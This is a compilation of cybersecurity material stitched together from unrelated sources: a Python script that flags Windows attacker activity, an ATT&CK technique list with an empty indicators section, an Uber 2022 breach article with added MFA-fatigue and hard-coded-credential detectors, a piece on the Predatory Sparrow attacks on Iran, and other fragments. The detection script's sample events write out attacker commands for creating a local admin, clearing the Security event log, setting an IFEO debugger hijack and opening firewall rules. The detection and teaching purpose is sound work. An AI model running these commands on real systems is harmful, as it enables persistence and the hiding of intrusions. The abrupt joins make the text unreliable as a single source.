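from collections import defaultdict
from dataclasses import dataclass
from pathlib import PureWindowsPath

SYS32 = "C:\\Windows\\System32\\"
IFEO_KEY = "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options"

# Constructed sample events; hosts, users and arguments are invented. Elided
# specifics from the report are kept as <placeholders> rather than filled in.
SAMPLE_EVENTS = [
    {"id": 1, "host": "ws01", "user": "CORP\\alice", "parent": "explorer.exe",
     "image": SYS32 + "notepad.exe", "cmdline": "notepad.exe notes.txt"},
    {"id": 2, "host": "ctx03", "user": "CORP\\svc-citrix", "parent": "cmd.exe",
     "image": SYS32 + "net.exe", "cmdline": "net user z <password> /add"},
    {"id": 3, "host": "ctx03", "user": "CORP\\svc-citrix", "parent": "cmd.exe",
     "image": SYS32 + "net.exe", "cmdline": "net localgroup administrators z /add"},
    {"id": 4, "host": "dc01", "user": "CORP\\svc-citrix", "parent": "cmd.exe",
     "image": SYS32 + "ntdsutil.exe", "cmdline": "ntdsutil.exe <arguments elided>"},
    {"id": 5, "host": "ctx03", "user": "ctx03\\z", "parent": "cmd.exe",
     "image": SYS32 + "wevtutil.exe", "cmdline": "wevtutil.exe cl Security"},
    {"id": 6, "host": "ws07", "user": "NT AUTHORITY\\SYSTEM", "parent": "PSEXESVC.exe",
     "image": SYS32 + "reg.exe",
     "cmdline": 'reg add "' + IFEO_KEY + '\\<target.exe>" /v Debugger /t REG_SZ /d <payload>'},
    {"id": 7, "host": "ws07", "user": "NT AUTHORITY\\SYSTEM", "parent": "PSEXESVC.exe",
     "image": SYS32 + "netsh.exe",
     "cmdline": 'netsh advfirewall firewall set rule group="remote desktop" new enable=yes'},
    {"id": 8, "host": "ws07", "user": "ws07\\z", "parent": "cmd.exe",
     "image": "C:\\Users\\Public\\tool.exe", "cmdline": "C:\\Users\\Public\\tool.exe"},
    {"id": 9, "host": "ws01", "user": "CORP\\alice", "parent": "cmd.exe",
     "image": SYS32 + "net.exe", "cmdline": "net user alice"},          # benign query
    {"id": 10, "host": "dc01", "user": "CORP\\admin", "parent": "powershell.exe",
     "image": SYS32 + "wevtutil.exe", "cmdline": "wevtutil.exe qe Security /c:5"},  # benign
]

NET = ("net.exe", "net1.exe")


def _name(image):
    """Basename of the image path, lower-cased, independent of the host OS."""
    return PureWindowsPath(image).name.lower()


# (technique label from the report's ATT&CK mapping, description, predicate(event, args))
RULES = [
    ("T1136.001", "local account created via net.exe",
     lambda e, a: _name(e["image"]) in NET and "user" in a and "/add" in a),
    ("T1098", "account added to a local group via net.exe",
     lambda e, a: _name(e["image"]) in NET and "localgroup" in a and "/add" in a),
    ("T1003.003", "ntdsutil.exe executed (NTDS dump attempt on a DC)",
     lambda e, a: _name(e["image"]) == "ntdsutil.exe"),
    ("T1070.001", "event log cleared with wevtutil",
     lambda e, a: _name(e["image"]) == "wevtutil.exe" and ("cl" in a or "clear-log" in a)),
    ("T1546.012", "IFEO Debugger value written (logon-screen accessibility bypass)",
     lambda e, a: "image file execution options" in e["cmdline"].lower() and "debugger" in a),
    ("T1562.004", "host firewall rule enabled via netsh",
     lambda e, a: _name(e["image"]) == "netsh.exe" and "advfirewall" in a and "enable=yes" in a),
    ("staging", "executable run from the Public user profile",
     lambda e, a: e["image"].lower().startswith("c:\\users\\public\\")),
]


@dataclass(frozen=True)
class Finding:
    event_id: int
    host: str
    technique: str
    detail: str


def detect(events):
    """Apply every rule to every event; one Finding per rule hit."""
    findings = []
    for e in events:
        args = e["cmdline"].lower().split()
        for technique, label, pred in RULES:
            if pred(e, args):
                detail = f"{label} (parent: {e['parent']}, user: {e['user']})"
                findings.append(Finding(e["id"], e["host"], technique, detail))
    return findings


def techniques_by_host(findings):
    """Correlate findings per host; several TTPs on one host deserve priority."""
    by_host = defaultdict(set)
    for f in findings:
        by_host[f.host].add(f.technique)
    return dict(by_host)


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for f in hits:
        print(f"event {f.event_id:>2}  {f.host:<6} {f.technique:<10} {f.detail}")
    for host, ttps in sorted(techniques_by_host(hits).items()):
        print(host, sorted(ttps))
```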

MITRE ATT&CK mapping

All of the previously described TTPs that were observed in this attack are listed below based on the phase of the attack in which they occurred.

Initial Access

ATT&CK Technique: Phishing (T1566)

ATT&CK Technique: Valid Accounts (T1078)

ATT&CK Technique: System Services: Service Execution (T1569.002)

Persistence

ATT&CK Technique: Create Account: Local Account (T1136.001)

ATT&CK Technique: Account Manipulation: Device Registration (T1098.005)

Privilege Escalation

ATT&CK Technique: Event Triggered Execution: Image File Execution Options Injection (T1546.012)

Defense Evasion

ATT&CK Technique: Indicator Removal on Host (T1070)

ATT&CK Technique: Indicator Removal on Host: Clear Windows Event Logs (T1070.001)

ATT&CK Technique: Masquerading: Match Legitimate Name or Location (T1036.005)

ATT&CK Technique: Impair Defenses: Disable or Modify System Firewall (T1562.004)

ATT&CK Technique: Modify Registry (T1112)

Credential Access

ATT&CK Technique: OS Credential Dumping: LSASS Memory (T1003.001)

ATT&CK Technique: OS Credential Dumping: Security Account Manager (T1003.002)

ATT&CK Technique: OS Credential Dumping: NTDS (T1003.003)

ATT&CK Technique: Multi-Factor Authentication Request Generation (T1621)

Lateral Movement

ATT&CK Technique: Remote Services (T1021)

ATT&CK Technique: Query Registry (T1012)

Command and Control

ATT&CK Technique: Application Layer Protocol: Web Protocols (T1071.001)

ATT&CK Technique: Remote Access Software (T1219)

ATT&CK Technique: Encrypted Channel: Asymmetric Cryptography (T1573.002)

ATT&CK Technique: Proxy: Multi-hop Proxy (T1090.003)

Exfiltration

ATT&CK Technique: Exfiltration Over Alternative Protocol (T1048)

Indicators of compromise

The following indicators of compromise were observed associated with this attack.



What caused the Uber data breach in 2022?

Edward Kost


The Uber data breach began with a hacker purchasing stolen credentials belonging to an Uber employee from a dark web marketplace. An initial attempt to connect to Uber’s network with these credentials failed because the account was protected with MFA. To overcome this security obstacle, the hacker contacted the Uber employee via WhatsApp and, while pretending to be a member of Uber’s security team, asked the employee to approve the MFA notifications being sent to their phone. The hacker then sent a flood of MFA notifications to the employee’s phone to pressure them into complying with this request. To finally put an end to this notification storm, the Uber employee approved an MFA request, granting the hacker network access, which ultimately led to the data breach.

After completing the attack, the hacker compromised an Uber employee’s Slack account and announced the successful breach to the entire company.

Screenshot of the hacker's breach announcement in Uber's Slack channel

This isn’t the first time Uber has been hacked. In 2016, two hackers breached Uber’s systems, accessing names, email addresses, and phone numbers of 57 million users of the Uber app.

What Data Did the Hacker Access?

After successfully connecting to Uber’s intranet, the hacker gained access to the company’s VPN and discovered PowerShell scripts containing the login credentials of an admin user in Thycotic, the company’s Privileged Access Management (PAM) solution. This discovery significantly increased the severity of the breach by facilitating full admin access to all of Uber’s sensitive services, including DA, DUO, Onelogin, Amazon Web Services (AWS), and GSuite.

The hacker also allegedly accessed Uber’s bug bounty reports which usually contain details of security vulnerabilities yet to be remediated.

The 18-year-old hacker, believed to be associated with the cybercriminal group Lapsus$, revealed the details of the attack in a conversation with cybersecurity researcher Corben Leo.


Was any Sensitive User Data Stolen During the Uber Breach?

Despite the deep level of compromise the hacker achieved, no evidence of customer data theft has been announced. This is likely because the hacker wasn’t intent on causing harm but was, rather, chasing the thrill of a successful cyberattack and the hacker community respect that comes with it.

Had the hacker been motivated by financial gain, he would have likely sold Uber’s bug bounty reports on a dark web marketplace. Given the devastating data breach impact that’s possible with the findings of a bug bounty program, it would have sold for a very high price.

To say that Uber is lucky this hacker wasn’t an actual cybercriminal is a significant understatement. The company came so close to a complete system shutdown. From a cybersecurity perspective, it seems almost unbelievable that after taking complete control of Uber’s systems, the hacker just dropped everything and walked away. Without any security obstacles left to overcome, it would have been so easy to tie off the breach with a quick installation of ransomware.

Given Uber’s poor reputation for handling extortion attempts, thankfully, this didn’t happen. When Uber was breached in 2016, the company paid the cybercriminals their $100,000 ransom in exchange for deleting their copy of the stolen data. Then, in an attempt to conceal the event, the company forced the hackers to sign a non-disclosure agreement and made it appear as though the ransom payment was an innocuous reward within the company’s bug bounty program.


4 Key Lessons From the Uber Data Breach

Several critical cybersecurity lessons can be learned from the Uber data breach. By applying them to your cybersecurity efforts, you could potentially avoid suffering a similar fate.

1. Implement Cyber Awareness Training

The fact that the Uber employee eventually gave in to the flood of MFA requests in the initial stage of the attack is evidence of poor awareness of a common MFA exploitation tactic known as MFA fatigue. Had the Uber employee been aware of this tactic, they would likely have reported the threat rather than falling victim to it, which would have prevented the breach from happening. The hacker also used social engineering techniques to fool the Uber employee into thinking they were a member of Uber’s security team, which is another common cyberattack tactic.

Implementing cyber awareness training will equip your staff to recognize the common cyberattack methods that made this breach possible - MFA fatigue and social engineering.

The following free resources can be used to educate your employees about common cyber threats and the importance of cybersecurity:

  • What is Phishing?
  • What is Ransomware-as-a-Service?
  • What is Malware?
  • What is a Cyber Threat?
  • Why is Cybersecurity Important?
  • What is a Data Breach?

2. Be Aware of Common MFA Exploitation Methods

Not all Multi-Factor Authentication protocols are equal. Some are more vulnerable to compromise than others. Your cybersecurity teams should compare your current MFA processes against common exploit tactics and, if required, upgrade the complexity of authentication protocols to mitigate exploitation.

Learn about common MFA bypass methods >
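One concrete way to check your own environment for the push-bombing pattern described in lessons 1 and 2 is to look for it in authentication logs. The detector below is an added example, not code from the article or from any MFA vendor: the log format, the field names (user, event, result, src), the sample lines and the thresholds are all constructed for illustration and would need mapping onto whatever your identity provider actually emits.

```python
"""Detect MFA push-fatigue (push bombing) in authentication logs.

Added example. The log format is constructed for illustration: one event per
line, an ISO-8601 UTC timestamp, then key=value fields. The field names
(user, event, result, src) and the thresholds are assumptions to be mapped
onto whatever your identity provider actually emits.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample: "bob" receives nine pushes in about three minutes, all
# denied or expired, then approves one; "alice" shows ordinary behaviour.
SAMPLE_LOG = """\
2022-09-15T21:58:10Z user=alice event=mfa_push result=approved src=10.1.2.3
2022-09-15T22:01:03Z user=bob event=mfa_push result=denied src=203.0.113.9
2022-09-15T22:01:20Z user=bob event=mfa_push result=denied src=203.0.113.9
2022-09-15T22:01:41Z user=bob event=mfa_push result=timeout src=203.0.113.9
2022-09-15T22:02:02Z user=bob event=mfa_push result=denied src=203.0.113.9
2022-09-15T22:02:25Z user=bob event=mfa_push result=denied src=203.0.113.9
2022-09-15T22:02:50Z user=bob event=mfa_push result=timeout src=203.0.113.9
2022-09-15T22:03:15Z user=bob event=mfa_push result=denied src=203.0.113.9
2022-09-15T22:03:40Z user=bob event=mfa_push result=denied src=203.0.113.9
2022-09-15T22:04:05Z user=bob event=mfa_push result=denied src=203.0.113.9
2022-09-15T22:05:30Z user=bob event=mfa_push result=approved src=203.0.113.9
2022-09-15T22:30:00Z user=alice event=mfa_push result=denied src=10.1.2.3
2022-09-15T22:31:00Z user=alice event=mfa_push result=approved src=10.1.2.3
"""

REJECTED = {"denied", "timeout"}


@dataclass
class PushEvent:
    ts: datetime
    user: str
    result: str
    src: str


def parse_log(text):
    """Parse the constructed log format into PushEvent records, skipping
    blank lines and events that are not MFA pushes."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts_str, *fields = line.split()
        kv = dict(f.split("=", 1) for f in fields)
        if kv.get("event") != "mfa_push":
            continue
        ts = datetime.strptime(ts_str, "%Y-%m-%dT%H:%M:%SZ")
        events.append(PushEvent(ts, kv["user"], kv["result"], kv.get("src", "")))
    return events


def detect_mfa_fatigue(events, threshold=5, window=timedelta(minutes=10)):
    """Return one finding per user who accumulates `threshold` or more rejected
    or expired pushes inside `window`. `approved_after` records whether an
    approval followed the burst within the same window, i.e. the attack's
    success case rather than just the attempt."""
    by_user = defaultdict(list)
    for e in sorted(events, key=lambda e: e.ts):
        by_user[e.user].append(e)

    findings = []
    for user, evs in by_user.items():
        rejected = [e for e in evs if e.result in REJECTED]
        for i, start in enumerate(rejected):
            burst = [e for e in rejected[i:] if e.ts - start.ts <= window]
            if len(burst) < threshold:
                continue
            burst_end = burst[-1].ts
            approved = any(
                e.result == "approved" and burst_end <= e.ts <= start.ts + window
                for e in evs
            )
            findings.append({
                "user": user,
                "pushes": len(burst),
                "start": start.ts,
                "approved_after": approved,
                "sources": sorted({e.src for e in burst}),
            })
            break  # one finding per user is enough to raise an alert
    return findings


if __name__ == "__main__":
    for finding in detect_mfa_fatigue(parse_log(SAMPLE_LOG)):
        print(finding)
```

A burst that ends in an approval is the case to page on: the account should be treated as compromised until the user confirms the approval was theirs. A burst with no approval is still worth a ticket, because it tells you that a valid password for that account is already in someone else's hands.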

3. Never Hardcode Admin Login Credentials Anywhere (Ever)

Probably the most embarrassing cybersecurity blunder in this incident is the hardcoding of admin credentials inside a PowerShell script. This meant that the potential for an unauthorized user to access Uber’s sensitive systems was always there; all that was required was for someone to read the PowerShell script and discover the admin credentials contained therein.

This security flaw would have been avoided if secure coding practices had been followed. Admin credentials should always be stored securely in a password vault and certainly never hardcoded anywhere.
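A scanner that flags the kind of hard-coded credential the text describes, placed beside the vault-backed form the text recommends. This is an added example, not code from the article, from Uber or from Thycotic: both PowerShell scripts are constructed samples, and the hardened one assumes the Microsoft.PowerShell.SecretManagement module (its `Get-Secret` cmdlet) with a registered vault named CorpVault, which is an assumption.

```python
"""Flag hard-coded credentials in PowerShell scripts.

Added example. Both scripts below are constructed samples, not Uber's files.
The hardened sample assumes the Microsoft.PowerShell.SecretManagement module
(its Get-Secret cmdlet) with a registered vault called CorpVault; the vault
and secret names are assumptions.
"""
import re

# Constructed "before" script: the secret sits in the file, readable by
# anyone who can open it, which is the failure the text describes.
VULNERABLE_PS1 = r'''
# pam-export.ps1 (constructed sample)
$user = "svc_pam_admin"
$password = "Sup3rS3cretP@ss!"
$secure = ConvertTo-SecureString "Sup3rS3cretP@ss!" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential($user, $secure)
Invoke-RestMethod -Uri "https://pam.example.internal/api/export" -Credential $cred
$apiKey = 'AKIAEXAMPLE000000000'
'''

# Constructed "after" script: the same job, but the secret is fetched from
# a vault at run time and never written into the script.
HARDENED_PS1 = r'''
# pam-export.ps1 (hardened, constructed sample)
$user = "svc_pam_admin"
$secure = Get-Secret -Name "pam-admin-password" -Vault "CorpVault"
$cred = New-Object System.Management.Automation.PSCredential($user, $secure)
Invoke-RestMethod -Uri "https://pam.example.internal/api/export" -Credential $cred
'''

# Each rule matches a string literal sitting where a secret would be.
RULES = [
    ("plaintext-securestring",
     re.compile(r'ConvertTo-SecureString\s+["\'][^"\']+["\']\s+-AsPlainText', re.I)),
    ("secret-variable",
     re.compile(r'\$\w*(pass|pwd|secret|token|key)\w*\s*=\s*["\'][^"\']+["\']', re.I)),
    ("secret-parameter",
     re.compile(r'-(Password|Secret|Token|ApiKey)\s+["\'][^"\']+["\']', re.I)),
    ("aws-access-key-id",
     re.compile(r'\bAKIA[0-9A-Z]{16}\b')),
]

STRING_LITERAL = re.compile(r'["\'][^"\']+["\']')


def scan_powershell(script):
    """Return findings as dicts with the 1-based line number, the rule name
    and the offending line with its string literals masked, so the report
    itself does not leak the secret it found."""
    findings = []
    for lineno, line in enumerate(script.splitlines(), start=1):
        if line.lstrip().startswith("#"):
            continue  # comments are not executable; skip them
        for name, rule in RULES:
            if rule.search(line):
                findings.append({
                    "line": lineno,
                    "rule": name,
                    "snippet": STRING_LITERAL.sub('"***"', line.strip()),
                })
    return findings


if __name__ == "__main__":
    for label, text in (("vulnerable", VULNERABLE_PS1), ("hardened", HARDENED_PS1)):
        found = scan_powershell(text)
        print(f"{label}: {len(found)} finding(s)")
        for f in found:
            print(f"  line {f['line']:>2} [{f['rule']}] {f['snippet']}")
```

Run it as a pre-commit hook or over a file share of operational scripts; the rules are deliberately simple pattern matches, so expect to tune them, and treat any hit on a script that also grants privileged access (a PAM export, a cloud console call) as a rotate-the-credential event, not just a lint warning.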

4. Implement a Data Leak Detection Service

If the Uber hacker had had more malicious intentions, customer data would have been stolen, published on the dark web, and accessed multiple times by cybercriminals before Uber even realized it was breached. It’s crucial for organizations to have a safety net in place for detecting dark web data leaks from undetected data breaches, from both first-hand and third-party attacks.

A data leak detection service notifies impacted businesses when sensitive data leaks are detected on the dark web so that cybersecurity teams can secure compromised accounts before they’re targeted in follow-up attacks.

Learn how data leak detection can reduce the impact of ransomware attacks.


Learn about other Famous Data Breaches:

  • What Caused the Optus Data Breach?
  • What Caused the Medicare Data Breach?
  • How did LAUSD Get Hacked?
  • How did Plex Get Hacked?
  • How did Cash App Get Hacked?

Reviewed by

Kaushik Sen


How a Group of Israel-Linked Hackers Has Pushed the Limits of Cyberwar

A blue colored rip through a mosaic of green and black and white images showing smoke and embers in a mill.

About eight minutes after 3 am on June 27, 2022, inside the Khouzestan steel mill near Iran's western coastline on the Persian Gulf, a massive lid lowered onto a vat of glowing, molten metal. Based on footage from a surveillance camera inside the plant, the giant vessel was several times taller than the two workers in gray uniforms and hardhats standing nearby, likely large enough to carry well over a hundred tons of liquid steel heated to several thousand degrees Fahrenheit.

In the video, the two workers walk out of frame. The clip jump-cuts forward 10 minutes. Then suddenly, the giant ladle is moving, swinging steadily toward the camera. A fraction of a second later, burning embers fly in all directions, fire and smoke fill the factory, and incandescent, liquid steel can be seen pouring freely out of the bottom of the vat onto the plant floor.

Written across the bottom of the video is a kind of disclaimer from Predatory Sparrow, the group of hackers who took credit for this cyber-induced mayhem and posted the video clip to their channel on the messaging service Telegram: “As you can see in this video,” it reads, “this cyberattack has been carried out carefully so to protect innocent individuals.”

A close watch of the video, in fact, reveals something like the opposite: Eight seconds after the steel mill catastrophe begins, two workers can be seen running out from underneath the ladle assembly, through the shower of embers, just feet away from the torrent of flaming liquid metal. “If they were closer to the ladle egress point, they would have been cooked,” says Paul Smith, the chief technology officer of industrial-focused cybersecurity firm SCADAfence, who analyzed the attack. “Imagine getting hit by 1,300-degrees-Celsius molten steel. That's instant death.”

A clip from a video posted by Predatory Sparrow hacker group showing the effects of its cyberattack on Khouzestan steel mill in Iran. Although the group claims in the video’s text to have taken care to protect “innocent individuals,” two steelworkers can be seen (circled in red) narrowly escaping the spill of molten metal and the resulting fire that the hackers triggered.

The Khouzestan steel mill sabotage represents one of only a handful of examples in history of a cyberattack with physically destructive effects. But for Predatory Sparrow, it was just a part of a years-long career of digital intrusions that includes several of the most aggressive offensive hacking incidents ever documented. In the years before and after that attack—which targeted three Iranian steelworks, though only one intrusion successfully caused physical destruction—Predatory Sparrow crippled the country's railway system computers and disrupted payment systems across the majority of Iran's gas station pumps not once but twice, including in an attack last month that once again disabled point-of-sale systems at more than 4,000 gas stations, creating a nationwide fuel shortage.

In fact, Predatory Sparrow, which typically refers to itself in public statements by the Farsi translation of its name, Gonjeshke Darande, has been tightly focused on Iran for years, long before Israel's war with Hamas further raised tensions between the two countries. Very often the hackers target the Iranian civilian population with disruptive attacks that follow Iran's own acts of aggression through hacking or military proxies. The latest gas station attack, for instance, came after Iran-linked hackers compromised Israeli-made equipment at water utilities around the world and Iran-backed Houthi rebels launched missiles at Israel and attacked shipping vessels in the Red Sea. “Khamenei!” Predatory Sparrow wrote in Farsi on its Twitter feed, addressing Iran's supreme leader. “We will react against your evil provocations in the region.”

While Predatory Sparrow maintains the veneer of a hacktivist group—often affecting the guise of one that is itself Iranian—its technical sophistication hints at likely involvement from a government or military. US defense sources speaking to The New York Times in 2021 linked the hackers to Israel. Yet some cybersecurity analysts who track the group say that even as it carries out attacks that fit most definitions of cyberwar, one of its hallmarks is restraint—limiting the damage it could cause while demonstrating it could have achieved more. Attempting to achieve an appearance of restraint, at least, might be more accurate: The physical endangerment of at least two Khouzestan staffers in its steel mill attack represents a glaring exception to its claims of safety.


Predatory Sparrow is distinguished most of all by its apparent interest in sending a specific geopolitical message with its attacks, says Juan Andres Guerrero-Saade, an analyst at cybersecurity firm SentinelOne who has tracked the group for years. Those messages are all variations on a theme: If you attack Israel or its allies, we have the ability to deeply disrupt your civilization. “They're showing that they can reach out and touch Iran in meaningful ways,” Guerrero-Saade says. “They're saying, ‘You can prop up the Houthis and Hamas and Hezbollah in these proxy wars. But we, Predatory Sparrow, can dismantle your country piece by piece without having to move from where we are.’”

Here's a brief history of Predatory Sparrow's short but distinguished track record of hyper-disruptive cyberattacks.

In early July of 2021, computers showing schedules across Iran's national railway system began to display messages in Farsi reading “long delay because of cyberattack,” or simply “canceled,” along with the phone number of the office of Iran's Supreme Leader Ali Khamenei, as if to suggest that Iranians call the number for updates or to complain. SentinelOne's Guerrero-Saade analyzed the malware used in the attack, which he dubbed Meteor Express, and found that the hackers had deployed a three-stage wiping program that destroyed computers' file systems, locked out users, and then wiped the master boot record that machines use to locate their operating system when they start up. Iran's Fars radio station reported that the result of the cyberattack was “unprecedented chaos,” but it later deleted that statement.

Around the same time, computers across the network of Iran's Ministry of Roads and Urban Development were hit with the wiper tool, too. Analysis of the wiper malware by Israeli security firm CheckPoint revealed that the hackers had likely used different versions of the same tools years earlier while breaking into Iran-linked targets in Syria, in those cases under the guise of a hacker group named for the Hindu god of storms, Indra.

“Our goal of this cyber attack while maintaining the safety of our countrymen is to express our disgust with the abuse and cruelty that the government ministries and organizations allow to the nation,” Predatory Sparrow wrote in a post in Farsi on its Telegram channel, suggesting that it was posing as an Iranian hacktivist group as it claimed credit for the attacks.

Just a few months later, on October 26, 2021, Predatory Sparrow struck again. This time, it targeted point-of-sale systems at more than 4,000 gas stations across Iran—the majority of all fuel pumps in the country—taking down the system used to accept payment by gasoline subsidy cards distributed to Iranian citizens. Hamid Kashfi, an Iranian emigré and founder of the cybersecurity firm DarkCell, analyzed the attack but only published his detailed findings last month. He notes that the attack's timing came exactly two years after the Iranian government attempted to reduce fuel subsidies, triggering riots across the country. Echoing the railway attack, the hackers displayed a message on fuel pump screens with the Supreme Leader's phone number, as if to blame Iran's government for this gas disruption, too. “If you look at it from a holistic view, it looks like an attempt to trigger riots again in the country,” Kashfi says, “to increase the gap between the government and the people and cause more tension.”

The attack immediately led to long lines at gas stations across Iran that lasted days. But Kashfi argues that the gas station attack, despite its enormous effects, represents one where Predatory Sparrow demonstrated actual restraint. He inferred, based on detailed data uploaded by Iranian incident responders to the malware repository VirusTotal, that the hackers had enough access to the gas stations' payment infrastructure to have destroyed the entire system, forcing manual reinstallation of software at gas stations or even reissuing of subsidy cards. Instead, they merely wiped the point-of-sale systems in a way that would allow relatively quick recovery.

Predatory Sparrow even went so far as to claim on its Telegram account that it had emailed the vendor for the point-of-sale systems, Ingenico, to warn the company about an unpatched vulnerability in its software that could have been used to cause more permanent disruption to the payment system. (Curiously, an Ingenico spokesperson tells WIRED its security team never received any such email.)

Predatory Sparrow also wrote on Telegram that it had sent text messages to Iran's civilian emergency services, posting screenshots of its warnings to those emergency services to fuel up their vehicles prior to the attack. “You don't see that often, right?” Kashfi says. “They chose to do very clean, controlled damage.”

In June of 2022, Predatory Sparrow carried out one of the most brazen acts of cybersabotage in history, triggering the spillage of molten steel at Iran's Khouzestan steel mill that caused a fire in the facility.

To prove that it had carried out the attack and had not merely claimed credit for an unrelated industrial accident, the hackers posted a screenshot to Telegram of the so-called human-machine interface, or HMI software, that the steelworks used to control its equipment. Paul Smith, the SCADAfence CTO who investigated the incident, quickly found a page on the website of the Iranian IT firm Irisa that listed the Khouzestan steel mill as one of its projects, matching the Irisa logo on the HMI screenshot.

Smith says he also found that both the HMI software and the surveillance camera that Predatory Sparrow used to record a video of its attack were connected to the internet and discoverable on Shodan, a search engine that catalogs vulnerable internet-of-things devices. Smith, who has a background working in steel mills, theorizes that the attack's damage was caused when the hackers used their access to the HMI to bypass a “degassing” step in the steel refining process that removes gases trapped in molten steel, which can otherwise cause explosions. He speculates that it was exactly that sort of explosion of gases trapped in the molten steel that caused the ladle to move and pour its contents on the factory floor.

A still from Predatory Sparrow’s video shows the Khouzestan steel mill prior to the hackers’ cyberattack…

…then after the attack begins, as embers, fire and smoke fill the factory…

…caused by a spill of burning liquid steel onto the factory floor, visible here.

Predatory Sparrow touted in its video, which it posted to Telegram, that it had carried out the attack “carefully so to protect innocent individuals,” suggesting that it had monitored the surveillance footage to make sure no humans were in danger. Smith doesn't buy that claim. Even beyond the two Iranian steelworkers forced to run through flying embers, feet away from burning liquid metal, he argues that the viewer can't see who else might have been in harm's way. “You don't know if anyone was hurt,” Smith says.

The Khouzestan steel mill was just one of three steel facilities that Predatory Sparrow breached in its intrusions, though those operations weren't solely targeted at physical sabotage. A week later, the group also began to post tens of thousands of stolen emails from the three steel facilities—all of which faced Western sanctions—designed to demonstrate their ties to the Iranian military.

With tensions rising across the Middle East following Hamas' October 7 attacks in southern Israel and Israel's overwhelming military response in the Gaza Strip, perhaps it was inevitable that Predatory Sparrow would play a role in that burgeoning conflict. As Iran-backed Houthi rebels began to blockade shipping in the Red Sea—and as an Iran-linked hacker group calling itself CyberAveng3rs hacked water utilities across the US with anti-Israel messages—the group staged a December 18 rerun of its 2021 gas station attack, crippling point-of-sale systems at pumps at the majority of the country's filling stations.

While technical details of this latest attack are still scant, DarkCell's Hamid Kashfi says it appears to follow the same playbook as the 2021 hacking incident, albeit likely exploiting different security vulnerabilities in the equipment. Again, Predatory Sparrow posted messages it claimed to have sent to Iranian emergency services ahead of the disruption, in an attempt to limit harm. “As in our previous operations, this cyberattack was conducted in a controlled manner while taking measures to limit potential damage to emergency services,” reads a message from the group on Telegram.

Yet again, Predatory Sparrow also made clear its hacking was intended to carry a message. “This cyberattack comes in response to the aggression of the Islamic Republic and its proxies in the region,” another of the group’s messages reads. “Khamenei, playing with fire has a price.”

SentinelOne’s Guerrero-Saade argues that actions like the gas station cyberattacks suggest that Predatory Sparrow may be the first effective example of what cyber policy wonks refer to as “signaling”—using cyberattack capabilities to send messages designed to deter an adversary's behavior. That's because, he says, the group has combined a relatively restrained and discriminating approach to its politically motivated hacking with a clear demonstration of willingness to use its capabilities for broad effects—a willingness, he points out, that the United States’ hacking agencies, like the National Security Agency and Cyber Command, have often lacked.

“There’s no such thing as effective signaling if you can’t show credibly to the other person that not only do you have the capability, but that you’re willing to use it,” Guerrero-Saade says.

Some cybersecurity researchers point to Predatory Sparrow, too, as a model of more responsible cyberwarfare, with a more careful regard for civilians. In the wake of the Israeli military’s killing of tens of thousands of Palestinian civilians and the displacement of millions more in its response to Hamas' October 7 massacre, however, any suggestion of restraint or discrimination from a hacker group that likely has Israeli government ties warrants skepticism.

Guerrero-Saade himself admits that the steel mill attack video, and in particular the two Iranian staffers’ apparent close call with death captured in it, raises questions of the cost of Predatory Sparrow’s “careful” style of attack.

“Is it perfect? Is it without casualties or concerns? Not at all,” Guerrero-Saade says. “I’m not saying I support it. But I am fascinated by it.”

The Devastating Business Impacts of a Cyber Breach

  • Keman Huang,
  • Xiaoqing Wang,
  • William Wei,
  • Stuart Madnick


No company can afford to underestimate the long-term financial costs.

Cybersecurity risks are becoming more systematic and more severe. Although the short-term impacts of a cyberattack on a business are quite severe, the long-term impacts can be even more important, such as the loss of competitive advantage, reduction in credit rating, and increase in cyber insurance premiums. They should not be ignored. To address these concerns effectively, companies need to: 1) Have a cybersecurity champion on the board to help set the tone for the organization, and 2) develop a long-term cybersecurity strategy, which should be a priority for every organization.

Cyber risks are skyrocketing. The latest IBM Data Breach Report revealed that an alarming 83% of organizations experienced more than one data breach during 2022. According to the 2022 Verizon Data Breach Investigations Report, the total number of ransomware attacks surged by 13%, which is a rise equal to the last five years combined. The severity of the situation continues to be evident with the public disclosure of at least 310 cyber incidents that occurred in the past three months alone, according to January, February, and March data from IT Governance. These include OpenAI’s ChatGPT, which exposed the payment-related and other sensitive information of 1.2% of its ChatGPT Plus subscribers due to a bug in an open-source library it used. Moreover, Samsung semiconductor has recorded three incidents where employees accidentally leaked company information when using ChatGPT.


  • Keman Huang is an Associate Professor at the Renmin University of China and a Research Affiliate at the MIT Sloan School of Management, where he works on cybersecurity management and strategy, innovation ecosystems, and big data analysis.
  • Xiaoqing Wang is a Ph.D student majoring in information security at the School of Information, Renmin University of China. Her research interests include cybersecurity behaviors, innovations, and strategies.
  • William Wei is the leader of the Multi-Cloud Working Group of Cloud Security Alliance (CSA) Greater China, and has over 20 years of cyber security experience. He was the General Manager of Trusteer Greater China, Senior Security Specialist of IBM Greater China, Head and Technical Director of Entrust Asia Pacific, and has Silicon Valley startup experience. His research interests include Edge computing, Zero trust, Secure access service edge (SASE), Extended detection and response (XDR) and cyber security culture, etc.
  • Stuart Madnick is the John Norris Maguire (1960) Professor of Information Technologies in the MIT Sloan School of Management, Professor of Engineering Systems in the MIT School of Engineering, and Director of Cybersecurity at MIT Sloan (CAMS): the Interdisciplinary Consortium for Improving Critical Infrastructure Cybersecurity. He has been active in the cybersecurity field since co-authoring the book Computer Security in 1979.


Uber Cyber-Attack: A Live Timeline

Date: 18 September 2022


Uber needs no introduction, so we’ll skip that part and jump right into the big news: apparently it’s been compromised by an 18-year-old hacker!

As per media stories and numerous Tweets, it appears that a threat actor managed to get access to Uber’s vulnerability reports, the company’s internal systems, email dashboard, and Slack server. That’s not all: screenshots doing the rounds online also indicate that the hacker allegedly had access to critical Uber IT systems, security software and the Windows domain, the Amazon Web Services console, and VMware ESXi virtual machines.

The New York Times that first broke the news shared that it was in touch with the hacker who, apparently, claims that he managed to compromise Uber’s systems by performing a social engineering attack on an employee. 

As per other reports, the hacker also had access to the company's HackerOne bug bounty program, where they commented on all of the company's bug bounty tickets. If, as some stories allege, the attacker downloaded all vulnerability reports before losing access to Uber's bug bounty program, including vulnerability reports that have not been fixed, it’s a huge security risk to Uber even in the days to come. 

